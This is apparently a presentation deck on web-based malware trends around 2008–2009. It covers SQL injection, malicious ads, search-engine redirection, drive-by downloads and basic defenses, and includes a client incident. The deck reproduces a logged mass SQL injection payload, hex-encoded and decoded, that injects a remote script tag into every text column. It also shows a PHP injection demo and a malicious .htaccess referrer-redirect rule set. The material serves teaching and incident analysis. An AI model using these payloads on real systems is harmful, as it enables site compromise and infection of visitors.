1. Web-Based Malware Menace Spreading Fast Garry Bennett Marcelo Berger Kelley Gambera Elsa Madrigal David Pessis Chuck Roth Fred Salchli Presented By:

2. Malware Behavior is Changing  Malware no longer exclusive to malicious sites  Malware making its way to end user machine with no user interaction required  Malware establishing presence on end user machine  There has been explosive growth in new malicious code signatures Table 1. New malicious code signatures Source: Symantec Corporation

3. Interesting Trends  Malware are targeting mainstream sites  In 2008, Economist.com and MLB.com were both hit  Malware authors used DoubleClicks ad-serving software  Unsuspecting users clicked on what looked to be legitimate ads, but were actually clicking on a Trojan which installed itself on the user’s hard drive to collect personal information  Malware authors are now looking for a bigger audience  Mainstream sites provide this base  Users who go to these sites are less likely to be concerned about being the victim of malware attack  This is an increasing problem since the notion of being safe if one visits good sites no longer holds true  Web servers have evolved into complex code  No longer a static page  Third-party hosted material  Network layer communication and exposed weakness

4. Attack Techniques  SQL injection  Malicious advertisements  Search engine result redirection  Attacks on backend virtual hosting companies  Vulnerabilities in Web server or forum hosting software  Cross-site scripting (XSS) attacks

5. Attacks Not Mentioned in Paper  Sniffing & Interception (HTTP vs. HTTPS)  DNS Server Vulnerability Exploits  Allow malicious sites to be served  Authenticity Attacks

6. More Popular Attack Techniques: SQL Injection  Large, high-traffic sites have databases running in background  Read/write user interaction  Security must extend to databases and data  How it works:  Identifies input form vulnerabilities  Hacker inserts additional SQL instructions  Hacker can then navigate database and add mal content  Hidden links  E.g. Trojan.Asprox

7. 7 SQL Injection : Attack at Duo! Longstanding Client Client merged with another company that had an existing e-commerce application We hesitantly agreed to integrate and host the e- commerce application Code review and testing indicated security problems  Client pushed back on risk assessment and claimed e- commerce site would be retired in very near future Two years later... 7

8. 8 SQL Injection  First Order Attack  Attacker gains access to the database and can perform DML and/or DDL commands  Second Order Attack  Attacker inserts data into the database  Our attacker did both  Client called to report strange links appearing within the product pages of their site 8

9. 9 SQL Injection: Raw IIS Log 2008-04-12 17:59:39 W3SVC658304687 WEB14A POST /productcart/pc/viewCat_P.asp idCategory=57;DECLARE @S NVARCHAR(4000);SET @S= CAST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0 040004300200076006100720063006800610072002800320035003500290020004400450043004C004100520045002000540061 0062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00 650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D002000730079007 3006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E007300200062002000770068 00650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E0078007400790070006500 3D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E 00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F00 7200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F 0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00200020005400 610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049 004C004500280040004000460045005400430048005F005300540041005400550053003D003000290020004200450047004900 4E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D002000730065 00740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280 076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C00730063007200 69007000740020007300720063003D0068007400740070003A002F002F007700770077002E006100730070006400650072002E 0063006F006D002F0031002E006A0073003E003C002F007300630072006900700074003E00270027002700290046004500540 04300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007 200200049004E0054004F002000400054002C0040004300200045004E004400200043004C004F0053004500200054006100620 06C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C00 65005F0043007500720073006F007200 AS NVARCHAR(4000));EXEC(@S);-- 80 - 125.65.77.25 HTTP/1.0 Mozilla/3.0+(compatible;+Indy+Library) - - www.clientname.com 200 0 0 471 2377 2562www.clientname.com 9

10. 10 SQL Injection: 1st Order Attack POST /productcart/pc/viewCat_P.asp idCategory=57; DECLARE @S NVARCHAR(4000);SET @S= “ DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)” AS NVARCHAR(4000));EXEC(@S); 10

11. 11 SQL Injection: 2nd Order Attack OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']= rtrim(convert(varchar,['+@C+']))+ '' ''')http://www.axxxr.com/1.js FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor 11

12. 12 SQL Injection: Remediation  We immediately shut down the application  We built a scrubber which scanned database tables for signature and removed malicious calls  E commerce site was disintegrated from main site  Unhappy client; Unhappy service provider 12

13.  Malware delivered via what appears to be real ad  Issues:  Not all advertisers validate the ads hosted on legitimate sites  The nature of advertising/online publishing mechanisms dynamic and automated, thus difficult to trace  Authored using JavaScript  Functions can be easily misused to silently redirect user to malicious page regardless if hosting site remains clean  Ads are hard to detect because they quickly rotate  Rotate based on search parameters and/or end-user geography  Web site and ad publishers are unaware that ads contain malware More Popular Attack Techniques: Malicious Ads

14.  How Malicious ads work:  Pop up over a web site and redirect user to web page filled with malicious software  Entices user to click a link, which results in loading of malicious web site  Auto-redirects often utilize Flash technology whereas click-throughs use JavaScript or ActiveX to create pop up with clickable options  More Popular Attack Techniques: Malicious Ads http://www.smartcomputing.com/editorial/article.asp?article=articles%2F2008%2Fs1905%2F25s05%2F 25s05.asp Additional Source: Smart Computing, “How to Get Rid of Malicious Ads,” May 2008

15. More Popular Attack Techniques: Search Engine Result Redirection  Poisoned keywords related to popular searches  Metatags in web pages used to perform search engine optimization  Example: Easter verse, Easter verse poems, Easter greeting card verses  Re-directs to Malware Sites  Malware is downloaded  Misleading Apps are downloaded: anti-virus, windows updates, etc.  Detection Avoidance:  Referrer checking: avoid researchers who could be investigating the referral to the site  Modify HTTP Headers to avoid caching of pages  No-store, No-cache Source: http://cyberinsecure.com/easter-related-search-engine-results-poisoned-redirect-users-to-malicious-applications/

16. More Popular Attack Techniques: Backend Virtual Hosting Companies  Virtual Hosting Companies provide Web server hosting services to other companies or individuals  Attacking Virtual Hosts providers hackers with avenue to infect multiple sites associated with hosts  GoDaddy.com DDoS Attack: Hackers knocked down number of cliet Web sites for several hours in 2007  Techniques for compromising legitimate client Web sites:  Exploit applications on host to inject malicious code (HTML – iframes), and host then injects same code into client sites  DNS Spoofing attack using virtual Host name

17. How Malware Authors Reach Users  Get on to the user’s computer automatically  DNS cache poisoning  Drive by download  Software vulnerabilities  Web attack toolkits  Cat and mouse game  Obfuscation  Dynamically changing URLs and malware  Clickjacking  Get on to the user’s computer with help from the user  Fake codec  Malicious P2P files  Mal ads  Fake scanner web page  Blogs

18. Drive By Download  User just browses site and executable content is auto-downloaded onto user computer without their knowledge  True Four Years Ago… Browsers are more defensive today  Degrees of insecurity according to corporate policies  Some apps only supported by older browser versions  No user interaction required  “Good” web sites are targeted by attackers to establish user trust  Issue:  OS and browser may have latest patches but multimedia plug-ins and doc viewers are out of date and vulnerable  Attack method:  Hidden IFrame causes user browser to silently pull mal content  Mal authors are then able to pull OS, browser, etc. vulnerabilities and eventually pull personal information Entire attack is invisible to user

19. Other Automatic Attack Methods  Software vulnerabilities  “Bugs” or flaws in applications  Attacker can compromise system on which software is installed  Web attack toolkits  Off-the-shelf software written to probe user’s computer and automatically exploit security holes  Obfuscation  Encryption of malcode, typically in JavaScript  Dynamically changing URLs and malware  Malicious domains which appear to be real ones associated with search engine statistics  Clickjacking  Attacker puts invisible layer on Web page and user unknowingly clicks “fake” buttons, links to malware

20. Older Detection Techniques No Longer Work  Older, signature-based antivirus-only detection techniques are far less effective  Multimedia, reader, browser, and third-party software vulnerabilities are hard to detect using traditional virus signatures  Traditional antivirus software only knows how to search in files, not network  Attacks are invisible  New methods for detection are necessary  Security is heavily dependent on user’s habits  i.e. needs to keep up with patches, security updates, etc.  Security lockdown is practiced by website owners who have high stakes in secure web transactions

21. User-Assisted Attack Methods  Social engineering  People are tricked into performing actions  Examples:  Fake codec  Software that can decode a binary file and reconstitute a version of the original audio or video  “Tempting” content gives malware authors the ability to get users to install new codec to reach desired content  Screenshot shows fake codec to install video, but instead it’s malware  Trojan is installed and infects user’s computer  Malicious P2P files  Files using celebrity names or popular brand names

22. User-Assisted Attack Methods (cont’d)  Examples:  Malicious ads  One of the most blatant techniques  Direct advertisement of malware to unsuspecting users (in contrast to using actual product/company names)  E.g. Fake copy of a newly-released game  Fake scanner web page  Leverage JavaScript capabilities of a browser  Content appears to be legitimate OS alert notification  A “scare tactic” approach to get users to execute malware  Blogs  Bogus links which point to malware

23. Symantec Top Web Threats 2008  Drive-by downloads  Obfuscation  Targeting browser plug-ins instead of just browser  Misleading apps  SQL injection in mainstream sites  Unique and targeted malware  ‘Polymorphing’ Tools

24. New Threats for 2009 and Beyond  Bogus services  Legal, financial, car transport  “Mule” recruitment sites  Spam  Professional-looking sites  Social networking vulnerabilities with Web 2.0**  Hacked accounts  Cross-Site Scripting (XSS)  Cross Site Request Forgery (CSRF)  Phishing  Information Leakage  Injection flaws (Javascript, XML, Xpath, JSON)  Information integrity (i.e. wrong entries on wikipedia)  Insufficient anti-automation  vulnerable to brute force and CSRF attacks  High-visibility news events  Quick distribution of malware  Replacement of email attachments with hyperlinks Twitter CSRF Attack **Source: Top Web 2.0 Security Threats, Secure Enterprise 2.0 Forum

25. Methods of Defense  Techniques for Counter-Acting Web-based Attacks  User-awareness (don’t click on anything funny)  Don’t download apps you don’t trust  Keep your OS updated  Use anti-phishing, malware, spam software No single silver bullet… Just a bunch of silver bb’s…

26. 26 Garry’s Slides

27. SQL Injection Example // a good user's name $name = "timmy"; $query = "SELECT * FROM customers WHERE username = '$name'"; echo "Normal: ". $query. " "; // user input that uses SQL Injection $name_bad = "' OR 1'"; // our MySQL query builder, however, not a very safe one $query_bad = "SELECT * FROM customers WHERE username = '$name_bad'";

28. SQL Injection Example - Cont. // display what the new query will look like, with injection echo "Injection: ". $query_bad; Normal: SELECT * FROM customers WHERE username = 'timmy‘ Injection: SELECT * FROM customers WHERE username = '' OR 1''

29.  Legitimate sites that have been hacked to redirect to various rogue anti-malware “scan” sites  The malicious redirect only occurs when a user arrives at the site via search engine results  Visiting the sites directly (i.e. via a bookmark or manually entering the address) results in no redirect  Site owners’ visiting their site directly won’t see any evidence of the redirect  Since many sites receive a majority of their traffic from search engines, that large majority of users will keep getting redirected to the malicious site More Popular Attack Techniques: Search Engine Results Redirection

30. More Popular Attack Techniques: Search Engine Result Redirection Example The root cause of many of these hacks is a maliciously modified.htaccess file commonly used on Apache web servers RewriteEngine On RewriteCond %{HTTP_REFERER}.*google.*$ [NC,OR] RewriteCond %{HTTP_REFERER}.*yahoo.*$ [NC,OR] RewriteCond %{HTTP_REFERER}.*msn.*$ [NC,OR] RewriteCond %{HTTP_REFERER}.*ask.*$ [NC,OR] RewriteCond %{HTTP_REFERER}.*aol.*$ [NC,OR] RewriteCond %{HTTP_REFERER}.*altavista.*$ [NC,OR] RewriteCond %{HTTP_REFERER}.*netscape.*$ [NC]... RewriteRule.* http://badsite-omitted/ [R=301,L] In some cases it ’ s replaced completely, in other cases the bad rules are added to the existing contents.

31. More Popular Attack Techniques: Malicious Ads Example